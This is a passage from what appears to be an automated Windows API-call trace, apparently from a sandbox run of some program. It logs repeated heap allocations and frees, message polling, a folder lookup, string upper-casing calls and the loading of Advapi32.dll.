dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0206.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0206.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0206.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0206.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0206.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0206.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0206.171] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0206.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0206.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0206.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0206.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0206.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0206.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0206.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0206.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0206.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0206.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0206.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0206.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0206.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0206.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0206.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0206.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0206.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.172] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0206.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0206.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0206.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0206.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.173] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0206.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0206.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0206.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0206.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0206.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0206.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0206.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0206.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0206.174] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b56c6e0, ftCreationTime.dwHighDateTime=0x1d5ccdb, ftLastAccessTime.dwLowDateTime=0xc000e480, ftLastAccessTime.dwHighDateTime=0x1d5d46f, ftLastWriteTime.dwLowDateTime=0xc000e480, ftLastWriteTime.dwHighDateTime=0x1d5d46f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LWx-lTCW5BQnV", cAlternateFileName="LWX-LT~1")) returned 0x9e1bf8 [0206.174] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0206.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0206.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0206.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0206.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0206.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0206.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0206.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.174] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0206.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0206.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0206.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0206.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0206.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0206.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0206.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0206.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.176] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.176] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0206.176] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0206.176] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.176] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0206.176] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.176] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.176] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0206.176] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0206.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0206.177] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0206.177] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.177] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0206.177] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0206.177] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0206.178] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0206.178] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.178] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0206.178] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) 